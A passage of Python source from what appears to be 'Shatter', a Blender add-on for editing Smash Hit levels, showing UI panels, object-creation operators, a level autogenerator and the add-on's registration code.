\"Mesh\"):\n\t\t\t# Lighting\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Light\", icon = \"LIGHT\")\n\t\t\t# sub.prop(sh_properties, \"sh_basic_lighting\")\n\t\t\t#if (sh_properties.sh_basic_lighting):\n\t\t\tif (True):\n\t\t\t\tsub.prop(sh_properties, \"sh_light_right\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_left\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_top\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_bottom\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_front\")\n\t\t\t\tsub.prop(sh_properties, \"sh_light_back\")\n\t\t\t\n\t\t\tsub.prop(sh_properties, \"sh_lighting\")\n\t\t\tif (sh_properties.sh_lighting):\n\t\t\t\tsub.prop(sh_properties, \"sh_lighting_ambient\")\n\t\t\t\n\t\t\t# Mesh settings\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Meshes\", icon = \"MESH_DATA\")\n\t\t\tsub.prop(sh_properties, \"sh_menu_segment\")\n\t\t\tsub.prop(sh_properties, \"sh_ambient_occlusion\")\n\t\t\n\t\tif (bake_mode == \"StoneHack\"):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Stone\", icon = \"UV_DATA\")\n\t\t\tsub.prop(sh_properties, \"sh_stone_obstacle_name\")\n\t\t\tsub.prop(sh_properties, \"sh_legacy_colour_model\")\n\t\t\tif (sh_properties.sh_legacy_colour_model):\n\t\t\t\tsub.prop(sh_properties, \"sh_legacy_colour_default\")\n\t\t\n\t\t# Quick test\n\t\tif (bpy.context.preferences.addons[\"shatter\"].preferences.enable_quick_test_server):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Quick test\", icon = \"AUTO\")\n\t\t\tsub.prop(sh_properties, \"sh_fog_colour_top\")\n\t\t\tsub.prop(sh_properties, \"sh_fog_colour_bottom\")\n\t\t\tsub.prop(sh_properties, \"sh_room_length\")\n\t\t\tsub.prop(sh_properties, \"sh_gravity\")\n\t\t\tsub.prop(sh_properties, \"sh_music\")\n\t\t\tsub.prop(sh_properties, \"sh_echo\")\n\t\t\tsub.prop(sh_properties, \"sh_reverb\")\n\t\t\tsub.prop(sh_properties, \"sh_particles\")\n\t\t\tsub.prop(sh_properties, \"sh_difficulty\")\n\t\t\tsub.prop(sh_properties, \"sh_extra_code\")\n\t\t\tsub.label(text = f\"Your IP: {util.get_local_ip()}\")\n\t\t\n\t\t# DRM\n\t\tif (not bpy.context.preferences.addons[\"shatter\"].preferences.force_disallow_import):\n\t\t\tsub = layout.box()\n\t\t\tsub.label(text = \"Protection\", icon = \"LOCKED\")\n\t\t\tsub.prop(sh_properties, \"sh_drm_disallow_import\")\n\t\t\n\t\tlayout.separator()\n\nclass sh_ItemPropertiesPanel(Panel):\n\tbl_label = \"Smash Hit\"\n\tbl_idname = \"OBJECT_PT_obstacle_panel\"\n\tbl_space_type = \"VIEW_3D\" \n\tbl_region_type = \"UI\"\n\tbl_category = \"Item\"\n\tbl_context = \"objectmode\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn context.object is not None\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobject = context.object\n\t\tsh_properties = object.sh_properties\n\t\t\n\t\tui = butil.UIDrawingHelper(context, layout, sh_properties, compact = get_prefs().compact_ui)\n\t\t\n\t\t# All objects will have all properties, but only some will be used for\n\t\t# each of obstacle there is.\n\t\tt = ui.prop(\"sh_type\", text = \"\")\n\t\tui.prop(\"sh_template\")\n\t\t\n\t\tif (t == \"BOX\"):\n\t\t\tui.prop(\"sh_visible\", disabled = not not ui.get(\"sh_template\"))\n\t\t\t\n\t\t\t# silly little loop wrapper :-3\n\t\t\tfor x in [\"tint\", \"tile\"]:\n\t\t\t\tword = {\"tint\": \"Colour\", \"tile\": \"Tile\"}[x]\n\t\t\t\t\n\t\t\t\tui.region(\n\t\t\t\t\t{\"tint\": \"COLOR\", \"tile\": \"TEXTURE\"}[x],\n\t\t\t\t\tword,\n\t\t\t\t)\n\t\t\t\t\n\t\t\t\tif (ui.get(f\"sh_use_multi{x}\")):\n\t\t\t\t\tui.prop(f\"sh_use_multi{x}\", text = \"Uniform\", text_compact = f\"Uniform {word.lower()}\", use_button = True)\n\t\t\t\t\tui.prop(f\"sh_{x}1\")\n\t\t\t\t\tui.prop(f\"sh_{x}2\")\n\t\t\t\t\tui.prop(f\"sh_{x}3\")\n\t\t\t\telse:\n\t\t\t\t\tui.prop(f\"sh_use_multi{x}\", text = \"Per axis\", text_compact = f\"Per axis {word.lower()}\", use_button = True)\n\t\t\t\t\tui.prop(f\"sh_{x}\")\n\t\t\t\t\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tif (context.scene.sh_properties.sh_lighting):\n\t\t\t\tui.region(\"LIGHT\", \"Light\")\n\t\t\t\tui.prop(\"sh_glow\")\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"GRAPH\", \"Tile transforms\")\n\t\t\tui.prop(\"sh_tilesize\")\n\t\t\tui.prop(\"sh_tilerot\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.prop(\"sh_reflective\")\n\t\telif (t == \"OBS\"):\n\t\t\tui.region(\"COPY_ID\", \"Type\")\n\t\t\tui.prop(\"sh_use_chooser\", use_button = True)\n\t\t\tui.prop(\"sh_obstacle_chooser\" if ui.get(\"sh_use_chooser\") else \"sh_obstacle\", text = \"\", text_compact = \"Type\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"HIDE_OFF\", \"Visibility\")\n\t\t\tui.prop(\"sh_mode\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"SETTINGS\", \"Templates\")\n\t\t\tfor i in range(12):\n\t\t\t\tui.prop(f\"sh_param{i}\", text = \"\", text_compact = f\"Param {i}\", disabled = (i == 0) and (ui.get(\"sh_template\") != \"\"))\n\t\t\tui.end()\n\t\telif (t == \"DEC\"):\n\t\t\tui.region(\"TEXTURE\", \"Sprite\")\n\t\t\tui.prop(\"sh_decal\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"COLOR\", \"Colour\")\n\t\t\tui.prop(\"sh_havetint\", use_button = True, icon = \"COLOR\")\n\t\t\tif (ui.get(\"sh_havetint\")):\n\t\t\t\tui.prop(\"sh_tint\")\n\t\t\tui.prop(\"sh_blend\")\n\t\t\tui.end()\n\t\t\t\n\t\t\tif (context.object.dimensions[1] == 0.0 and context.object.dimensions[2] == 0.0):\n\t\t\t\tui.region(\"SETTINGS\", \"Size\")\n\t\t\t\tui.prop(\"sh_size\")\n\t\t\t\tui.end()\n\t\t\t\n\t\t\tui.region(\"HIDE_OFF\", \"Visibility\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\t\tui.end()\n\t\telif (t == \"POW\"):\n\t\t\tui.prop(\"sh_powerup\")\n\t\t\tui.prop(\"sh_difficulty\")\n\t\telif (t == \"WAT\"):\n\t\t\tpass\n\t\t\n\t\tui.prop(\"sh_hidden\")\n\t\tui.prop(\"sh_export\")\n\nclass sh_CreateBox(Operator):\n\t\"\"\"\n\tOperator to create a box\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_box\"\n\tbl_label = \"Create box\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_box((0,0,0), (1,1,1))\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateObstacle(Operator):\n\t\"\"\"\n\tOperator to create a obstacle\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_obstacle\"\n\tbl_label = \"Create obstacle\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"OBS\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateDecal(Operator):\n\t\"\"\"\n\tOperator to create a decal\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_decal\"\n\tbl_label = \"Create decal\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"DEC\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreatePowerup(Operator):\n\t\"\"\"\n\tOperator to create a powerup\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_powerup\"\n\tbl_label = \"Create powerup\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_empty()\n\t\to.sh_properties.sh_type = \"POW\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_CreateWater(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.create_water\"\n\tbl_label = \"Create water\"\n\t\n\tdef execute(self, context):\n\t\to = butil.add_box((0,0,0), (1,1,0))\n\t\to.sh_properties.sh_type = \"WAT\"\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass SHATTER_MT_3DViewportMenuExtras(Menu):\n\tbl_label = \"Extra features\"\n\t\n\tdef draw(self, context):\n\t\tself.layout.operator(\"shatter.export_level_package\")\n\t\tself.layout.separator()\n\t\tself.layout.operator(\"shatter.rebake_meshes\")\n\t\tself.layout.separator()\n\t\tself.layout.operator(\"shatter.segstrate_auto\")\n\t\tself.layout.operator(\"shatter.segstrate_static\")\n\nclass OpenShatterCreditsPage(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.open_credits_page\"\n\tbl_label = \"Credits and Third Party Libraries\"\n\t\n\tdef execute(self, context):\n\t\tif (secrets.randbelow(150) == 0):\n\t\t\tglobal g_got_ricked\n\t\t\twebbrowser.open(f\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\")\n\t\t\tg_got_ricked = True\n\t\telse:\n\t\t\twebbrowser.open(f\"https://github.com/Shatter-Team/Shatter/blob/trunk/CREDITS.md\")\n\t\treturn {\"FINISHED\"}\n\nclass OpenShatterPrivacyPage(Operator):\n\t\"\"\"\n\tOperator to create a water\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.open_privacy_page\"\n\tbl_label = \"Privacy and Security Statement\"\n\t\n\tdef execute(self, context):\n\t\twebbrowser.open(f\"https://shatter-team.github.io/Shatter/privacy.html\")\n\t\treturn {\"FINISHED\"}\n\nclass SHATTER_MT_3DViewportMenu(Menu):\n\tbl_label = \"Shatter\"\n\t\n\tdef draw(self, context):\n\t\tself.layout.menu(\"SHATTER_MT_3DViewportMenuExtras\")\n\t\t\n\t\tself.layout.separator()\n\t\t\n\t\tfor t in [(\"box\", \"MESH_CUBE\"), (\"obstacle\", \"MESH_CONE\"), (\"decal\", \"TEXTURE\"), (\"powerup\", \"SOLO_OFF\"), (\"water\", \"MATFLUID\")]:\n\t\t\tself.layout.operator(f\"shatter.create_{t[0]}\", icon = t[1])\n\t\t\n\t\tself.layout.separator()\n\t\t\n\t\tself.layout.operator(\"shatter.export_auto\", icon = \"MOD_BEVEL\")\n\t\tself.layout.operator(\"shatter.export_test_server\", icon = \"AUTO\")\n\ndef SHATTER_MT_3DViewportMenu_draw(self, context):\n\tself.layout.menu(\"SHATTER_MT_3DViewportMenu\")\n\n################################################################################\n# UTILITIES AND STUFF\n################################################################################\n\ndef run_updater():\n\ttry:\n\t\tupdater.check_for_updates(common.BL_INFO[\"version\"])\n\texcept Exception as e:\n\t\timport traceback\n\t\tprint(f\"Shatter for Blender: Had an exception whilst checking for updates:\")\n\t\tprint(traceback.format_exc())\n\ndef update_uid():\n\tuid_file = f\"{common.SHATTER_PATH}/data/uid\"\n\tuid_from_file = util.get_file(uid_file)\n\t\n\tuid_from_blender = get_prefs().uid\n\t\n\tif (not uid_from_blender):\n\t\tif (not uid_from_file):\n\t\t\t# Never had a uid before\n\t\t\tnew_uid = generate_uid()\n\t\t\tbpy.context.preferences.addons[\"shatter\"].preferences.uid = new_uid\n\t\t\tutil.set_file(uid_file, new_uid)\n\t\telse:\n\t\t\t# We have the file but not the saved uid, probably the user\n\t\t\t# reinstalled\n\t\t\tbpy.context.preferences.addons[\"shatter\"].preferences.uid = uid_from_file.replace(\"\\n\", \"\")\n\ndef generate_uid():\n\ts = secrets.token_hex(16)\n\treturn f\"{s[0:8]}-{s[8:16]}-{s[16:24]}-{s[24:32]}\"\n\n###############\n### AUTOGEN ###\n###############\n\nclass AutogenProperties(PropertyGroup):\n\t\n\tseed: IntProperty(\n\t\tname = \"Seed\",\n\t\tdescription = \"The seed to feed to the randomiser. Knowing the seed that you will run with allows you to recreate the exact results later\",\n\t\tdefault = 0,\n\t)\n\t\n\tauto_randomise: BoolProperty(\n\t\tname = \"Auto randomise\",\n\t\tdescription = \"Automatically generate a new, random seed every time a generation action is run\",\n\t\tdefault = True,\n\t)\n\t\n\ttype: EnumProperty(\n\t\tname = \"Type\",\n\t\tdescription = \"Type of thing you would like to generate\",\n\t\titems = [\n\t\t\t('BasicRoom', \"Room structure\", \"Adds a basic room-like structure, optionally including a door area\"),\n\t\t\t('SingleRow', \"Row of boxes\", \"A single row of boxes, often used before and after chasms. Look at the first room of the game for an example of this\"),\n\t\t\t('ArchWay', \"Archway\", \"Creates an arch-like structure with bumps and floor parts\"),\n\t\t],\n\t\tdefault = \"SingleRow\",\n\t)\n\t\n\talgorithm: EnumProperty(\n\t\tname = \"Algorithm\",\n\t\tdescription = \"Algorithm to use to generate the thing\",\n\t\titems = [\n\t\t\t('ActualRandom', \"ActualRandom\", \"Purely random box heights\"),\n\t\t\t('UpAndDownPath', \"UpAndDownPath\", \"\"),\n\t\t\t('ArithmeticProgressionSet', \"ArithmeticProgressionSet\", \"Randomly selected from a subset of a arithmetic series (ex: random of 1/2, 1/4, 1/6)\"),\n\t\t\t('GeometricProgressionSet', \"GeometricProgressionSet\", \"Randomly selected from a subset of a geometric series (ex: random of 1/2, 1/4, 1/8)\"),\n\t\t],\n\t\tdefault = \"ActualRandom\",\n\t)\n\t\n\ttemplate: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"Template to use for these boxes. You can also select a target box to copy properties from that box\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsize: FloatVectorProperty(\n\t\tname = \"Box size\",\n\t\tdescription = \"First is width, second is depth. Height is the random part\",\n\t\tdefault = (1.0, 1.0), \n\t\tmin = 0.0625,\n\t\tmax = 16.0,\n\t\tsize = 2,\n\t)\n\t\n\tmax_height: FloatProperty(\n\t\tname = \"Max height\",\n\t\tdescription = \"\",\n\t\tdefault = 0.5,\n\t\tmin = 0.0,\n\t\tmax = 16.0,\n\t)\n\t\n\t### Up and down path options ###\n\t\n\tudpath_start: FloatProperty(\n\t\tname = \"Initial height\",\n\t\tdescription = \"\",\n\t\tdefault = 0.25,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tudpath_step: FloatProperty(\n\t\tname = \"Step\",\n\t\tdescription = \"\",\n\t\tdefault = 0.125,\n\t\tmin = 0.0,\n\t\tmax = 0.5,\n\t)\n\t\n\tudpath_minmax: FloatVectorProperty(\n\t\tname = \"Min/max height\",\n\t\tdescription = \"\",\n\t\tdefault = (0.125, 0.5), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t\tsize = 2,\n\t)\n\t\n\t### Geometric/Airthmetic progression generator options ###\n\t\n\tgeometric_ratio: FloatProperty(\n\t\tname = \"Ratio\",\n\t\tdescription = \"\",\n\t\tdefault = 0.5,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tgeometric_exponent_minmax: IntVectorProperty(\n\t\tname = \"Exponent\",\n\t\tdescription = \"\",\n\t\tdefault = (1, 4),\n\t\tmin = 0,\n\t\tmax = 16,\n\t\tsize = 2,\n\t)\n\t\n\tgeometric_require_unique: BoolProperty(\n\t\tname = \"No repeating heights\",\n\t\tdescription = \"\",\n\t\tdefault = False,\n\t)\n\t\n\t### Room ###\n\t\n\troom_length: FloatProperty(\n\t\tname = \"Length\",\n\t\tdescription = \"\",\n\t\tdefault = 16.0,\n\t\tmin = 1.0,\n\t\tmax = 1024.0,\n\t)\n\t\n\troom_door_part: BoolProperty(\n\t\tname = \"Door part\",\n\t\tdescription = \"\",\n\t\tdefault = False,\n\t)\n\t\n\troom_yoffset: FloatProperty(\n\t\tname = \"Height offset\",\n\t\tdescription = \"How high or low the room will appear to the player\",\n\t\tdefault = 1.0,\n\t\tmin = -15.0,\n\t\tmax = 15.0,\n\t)\n\t\n\t### Arch ###\n\t\n\tarch_top_parts: BoolProperty(\n\t\tname = \"Top decorations\",\n\t\tdescription = \"\",\n\t\tdefault = True,\n\t)\n\nclass AutogenPanel(Panel):\n\tbl_label = \"Shatter Autogen\"\n\tbl_idname = \"OBJECT_PT_autogen_panel\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"Autogen\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn True\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tprops = context.scene.shatter_autogen\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Seed\", icon = \"GRAPH\")\n\t\tsub.prop(props, \"auto_randomise\")\n\t\tif (not props.auto_randomise):\n\t\t\tsub.prop(props, \"seed\")\n\t\t\tsub.operator(\"shatter.randomise_autogen_seed\", text = \"Randomise seed\")\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Generate\", icon = \"BRUSHES_ALL\")\n\t\tsub.prop(props, \"type\")\n\t\tif (props.type == \"SingleRow\"):\n\t\t\tsub.prop(props, \"algorithm\")\n\t\tif (not context.object):\n\t\t\tsub.prop(props, \"template\")\n\t\telse:\n\t\t\tsub.label(text = \"Copying props from selected\")\n\t\tif (props.type == \"SingleRow\" and props.algorithm != \"ArithmeticProgressionSet\"):\n\t\t\tsub.prop(props, \"max_height\")\n\t\tsub.prop(props, \"size\")\n\t\t\n\t\t# Single row options\n\t\tif (props.type == \"SingleRow\"):\n\t\t\tif (props.algorithm in [\"UpAndDownPath\"]):\n\t\t\t\tsub.prop(props, \"udpath_start\")\n\t\t\t\tsub.prop(props, \"udpath_step\")\n\t\t\t\tsub.prop(props, \"udpath_minmax\")\n\t\t\t\n\t\t\tif (props.algorithm in [\"GeometricProgressionSet\", \"ArithmeticProgressionSet\"]):\n\t\t\t\tsub.prop(props, \"geometric_ratio\")\n\t\t\t\tsub.prop(props, \"geometric_exponent_minmax\", text = \"Exponent\" if props.algorithm.startswith(\"G\") else \"Scalar\")\n\t\t\t\tsub.prop(props, \"geometric_require_unique\")\n\t\t\n\t\t# Room options\n\t\tif (props.type == \"BasicRoom\"):\n\t\t\tsub.prop(props, \"room_length\")\n\t\t\tsub.prop(props, \"room_yoffset\")\n\t\t\tsub.prop(props, \"room_door_part\")\n\t\t\n\t\t# Archway\n\t\tif (props.type == \"ArchWay\"):\n\t\t\tsub.prop(props, \"arch_top_parts\")\n\t\t\n\t\tsub.operator(\"shatter.run_autogen\", text = \"Generate\")\n\t\t\n\t\tlayout.separator()\n\nclass RunRandomiseSeedAction(bpy.types.Operator):\n\t\"\"\"\n\tRun the seed randomiser action\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.randomise_autogen_seed\"\n\tbl_label = \"Randomise Autogen Seed\"\n\t\n\tdef execute(self, context):\n\t\tcontext.scene.shatter_autogen.seed = random.randint(0, 2 ** 31 - 1)\n\t\t\n\t\treturn {'FINISHED'}\n\nclass BlenderPlacer:\n\t\"\"\"\n\tProvides an interface for the autogenerator to create boxes in blender in\n\ta generic way.\n\t\"\"\"\n\t\n\tdef __init__(self, basePos, baseSize, param3):\n\t\tif (basePos and baseSize):\n\t\t\tself.setBase(basePos, baseSize)\n\t\t\n\t\t# This is probably a bit insane, but it's probably not the worst way of\n\t\t# doing this...\n\t\tif (type(param3) == str):\n\t\t\tself.template = param3\n\t\telse:\n\t\t\tself.visible_object_props = param3.sh_properties\n\t\t\n\t\tself.objects = []\n\t\n\tdef setBase(self, basePos, baseSize):\n\t\t\"\"\"\n\t\tMake a base box from the blender location and size\n\t\t\"\"\"\n\t\t\n\t\tself.base = autogen.Box(autogen.Vector3(basePos[1], basePos[2], basePos[0]), autogen.Vector3(baseSize[1] / 2, baseSize[2] / 2, baseSize[0] / 2))\n\t\n\tdef getBase(self):\n\t\t\"\"\"\n\t\tGet the base box as a generic box\n\t\t\"\"\"\n\t\t\n\t\treturn self.base if hasattr(self, \"base\") else None\n\t\n\tdef inheritProperties(self, obj, template_append = \"\"):\n\t\t\"\"\"\n\t\tInherit the template or visible properties\n\t\t\"\"\"\n\t\t\n\t\t# Use the base box if one exists, otherwise just fallback to using the\n\t\t# template value\n\t\tif (hasattr(self, \"base\")):\n\t\t\tupdate_properties = [\"sh_visible\", \"sh_template\", \"sh_tint\", \"sh_use_multitint\", \"sh_tint1\", \"sh_tint2\", \"sh_tint3\", \"sh_tile\", \"sh_use_multitile\", \"sh_tile1\", \"sh_tile2\", \"sh_tile3\", \"sh_tilerot\", \"sh_tilesize\"]\n\t\t\t\n\t\t\tfor prop in update_properties:\n\t\t\t\tval = getattr(self.visible_object_props, prop)\n\t\t\t\tsetattr(obj.sh_properties, prop, val)\n\t\telse:\n\t\t\tobj.sh_properties.sh_template = self.template + template_append\n\t\n\tdef addBox(self, box):\n\t\t\"\"\"\n\t\tAdd a box to the scene\n\t\t\"\"\"\n\t\t\n\t\t# Add the mesh\n\t\tbpy.ops.mesh.primitive_cube_add(size = 1.0, location = (box.pos.z, box.pos.x, box.pos.y), scale = (box.size.z * 2, box.size.x * 2, box.size.y * 2))\n\t\t\n\t\t# The added mesh is always selected after, so we do this to get the object\n\t\tbox = bpy.context.active_object\n\t\t\n\t\t# Set the template or visible settings\n\t\tself.inheritProperties(box)\n\t\t\n\t\t# Append the box to the list of objects we have made\n\t\tself.objects.append(box)\n\t\n\tdef addObstacle(self, obs):\n\t\t\"\"\"\n\t\tAdd an obstacle to the scene\n\t\t\"\"\"\n\t\t\n\t\to = bpy.data.objects.new(\"empty\", None)\n\t\t\n\t\tbpy.context.scene.collection.objects.link(o)\n\t\t\n\t\to.empty_display_size = 1\n\t\to.empty_display_type = \"PLAIN_AXES\"\n\t\t\n\t\to.location = (obs.pos.z, obs.pos.x, obs.pos.y)\n\t\t\n\t\to.sh_properties.sh_type = \"OBS\"\n\t\to.sh_properties.sh_obstacle = obs.type\n\t\tself.inheritProperties(o, \"_glass\")\n\t\t\n\t\tself.objects.append(o)\n\t\n\tdef addDecal(self, dec):\n\t\t\"\"\"\n\t\tAdd a new decal to the scene\n\t\t\"\"\"\n\t\t\n\t\to = bpy.data.objects.new(\"empty\", None)\n\t\t\n\t\tbpy.context.scene.collection.objects.link(o)\n\t\t\n\t\to.empty_display_size = 1\n\t\to.empty_display_type = \"PLAIN_AXES\"\n\t\t\n\t\to.location = (dec.pos.z, dec.pos.x, dec.pos.y)\n\t\t\n\t\to.sh_properties.sh_type = \"DEC\"\n\t\to.sh_properties.sh_decal = dec.id\n\t\tself.inheritProperties(o)\n\t\t\n\t\tself.objects.append(o)\n\t\n\tdef selectAll(self):\n\t\t\"\"\"\n\t\tSelect all objects that were part of this round\n\t\t\"\"\"\n\t\t\n\t\tfor o in self.objects:\n\t\t\to.select_set(True)\n\nclass RunAutogenAction(bpy.types.Operator):\n\t\"\"\"\n\tRun the automatic generator\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.run_autogen\"\n\tbl_label = \"Run Shatter Autogen\"\n\t\n\tdef execute(self, context):\n\t\t\"\"\"\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\tFurries Furries Furries Furries Furries Furries Furries Furries Furries\n\t\t\"\"\"\n\t\t\n\t\tprops = context.scene.shatter_autogen\n\t\t\n\t\tif (props.auto_randomise):\n\t\t\tcontext.scene.shatter_autogen.seed = random.randint(0, 2 ** 31 - 1)\n\t\t\n\t\tplacer = BlenderPlacer(\n\t\t\tcontext.object.location if context.object else None,\n\t\t\tcontext.object.dimensions if context.object else None,\n\t\t\tcontext.object if context.object and (context.object.sh_properties.sh_visible or not props.template) else props.template,\n\t\t)\n\t\t\n\t\tparams = {\n\t\t\t\"seed\": props.seed,\n\t\t\t\"type\": props.type,\n\t\t\t\"size\": props.size,\n\t\t\t\"max_height\": props.max_height,\n\t\t}\n\t\t\n\t\t# For all single row types\n\t\tif (props.type == \"SingleRow\"):\n\t\t\t# Check if a box is currently selected, error if not\n\t\t\tif (not placer.getBase()):\n\t\t\t\tbutil.show_message(\"Shatter Autogen error\", \"To use the single row generator, please select a box to build on top of.\")\n\t\t\t\treturn {\"FINISHED\"}\n\t\t\t\n\t\t\tparams[\"algorithm\"] = props.algorithm\n\t\t\t\n\t\t\t# Geometric options\n\t\t\tif (props.algorithm in [\"GeometricProgressionSet\", \"ArithmeticProgressionSet\"]):\n\t\t\t\tparams[\"geometric_exponent_minmax\"] = props.geometric_exponent_minmax\n\t\t\t\tparams[\"geometric_ratio\"] = props.geometric_ratio\n\t\t\t\tparams[\"geometric_require_unique\"] = props.geometric_require_unique\n\t\t\t\n\t\t\t# UpDownPath options\n\t\t\tif (props.algorithm in [\"UpAndDownPath\"]):\n\t\t\t\tparams[\"udpath_min\"] = props.udpath_minmax[0]\n\t\t\t\tparams[\"udpath_max\"] = props.udpath_minmax[1]\n\t\t\t\tparams[\"udpath_start\"] = props.udpath_start\n\t\t\t\tparams[\"udpath_step\"] = props.udpath_step\n\t\t\n\t\t# Room options\n\t\tif (props.type == \"BasicRoom\"):\n\t\t\tparams[\"room_length\"] = props.room_length\n\t\t\tparams[\"room_yoffset\"] = props.room_yoffset\n\t\t\tparams[\"room_door_part\"] = props.room_door_part\n\t\t\n\t\t# Archway\n\t\tif (props.type == \"ArchWay\"):\n\t\t\tparams[\"top_parts\"] = props.arch_top_parts\n\t\t\n\t\tautogen.generate(placer, params)\n\t\t\n\t\tplacer.selectAll()\n\t\t\n\t\treturn {'FINISHED'}\n\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n\n# Ignore the naming scheme for classes, please\n# Also WHY THE FUCK DO I HAVE TO DO THIS???\nclasses = (\n\tsh_SceneProperties,\n\tsh_EntityProperties,\n\tsh_SegmentPanel,\n\tsh_ItemPropertiesPanel,\n\tsh_AddonPreferences,\n\tsh_export,\n\tsh_export_gz,\n\tsh_export_auto,\n\tsh_export_binary,\n\tsh_export_test,\n\tsh_import,\n\tsh_import_gz,\n\tsh_shl_login,\n\tsh_auto_setup_segstrate,\n\tsh_static_segstrate,\n\tsh_rebake_meshes,\n\tSHATTER_MT_3DViewportMenuExtras,\n\tSHATTER_MT_3DViewportMenu,\n\tsh_CreateBox,\n\tsh_CreateObstacle,\n\tsh_CreateDecal,\n\tsh_CreatePowerup,\n\tsh_CreateWater,\n\tOpenShatterCreditsPage,\n\tOpenShatterPrivacyPage,\n\tAutogenProperties,\n\tAutogenPanel,\n\tRunRandomiseSeedAction,\n\tRunAutogenAction,\n\tlevel_pack_ui.ExportLevelPackage,\n\tRandomiseKeyphrase,\n)\n\nkeymaps = {\n\t\"D\": \"shatter.create_box\",\n\t\"F\": \"shatter.create_obstacle\",\n\t\"X\": \"shatter.create_decal\",\n\t\"C\": \"shatter.create_powerup\",\n\t\"V\": \"shatter.create_water\",\n\t\"R\": \"shatter.export_auto\",\n\t\"E\": \"shatter.export_test_server\",\n}\n\nkeymaps_registered = []\n\ndef register():\n\tfrom bpy.utils import register_class\n\t\n\tfor cls in classes:\n\t\tregister_class(cls)\n\t\n\tbpy.types.Scene.sh_properties = PointerProperty(type=sh_SceneProperties)\n\tbpy.types.Scene.shatter_autogen = PointerProperty(type=AutogenProperties)\n\tbpy.types.Object.sh_properties = PointerProperty(type=sh_EntityProperties)\n\t\n\t# Add the export operator to menu\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_gz)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_auto)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_test)\n\t\n\t# Add import operators to menu\n\tbpy.types.TOPBAR_MT_file_import.append(sh_draw_import)\n\tbpy.types.TOPBAR_MT_file_import.append(sh_draw_import_gz)\n\t\n\t# Add Shatter menu in 3D viewport\n\tbpy.types.VIEW3D_MT_editor_menus.append(SHATTER_MT_3DViewportMenu_draw)\n\t\n\t# Register keymaps\n\twindow_manager = bpy.context.window_manager\n\t\n\tif (window_manager.keyconfigs.addon):\n\t\tfor a in keymaps:\n\t\t\tkeymap = window_manager.keyconfigs.addon.keymaps.new(name = '3D View', space_type = 'VIEW_3D')\n\t\t\tkeymap_item = keymap.keymap_items.new(keymaps[a], type = a, value = 'PRESS', shift = 1, alt = 1)\n\t\t\tkeymaps_registered.append((keymap, keymap_item))\n\t\n\t# Start server\n\tglobal g_process_test_server\n\t\n\tif (g_process_test_server and get_prefs().enable_quick_test_server):\n\t\ttry:\n\t\t\tg_process_test_server = quick_test.runServerProcess()\n\t\texcept Exception as e:\n\t\t\tprint(f\"*** Exception while starting quick test server ***\")\n\t\t\tprint(traceback.format_exc())\n\t\n\t# Check for updates\n\trun_updater()\n\t\n\t# Update user ID\n\tupdate_uid()\n\t\n\t# Check bad user info\n\tif (get_prefs().enable_bad_check):\n\t\timport bad_user as bad_user\n\t\tbad_user.bad_check(get_prefs().uid)\n\ndef unregister():\n\tfrom bpy.utils import unregister_class\n\t\n\t# Remove export 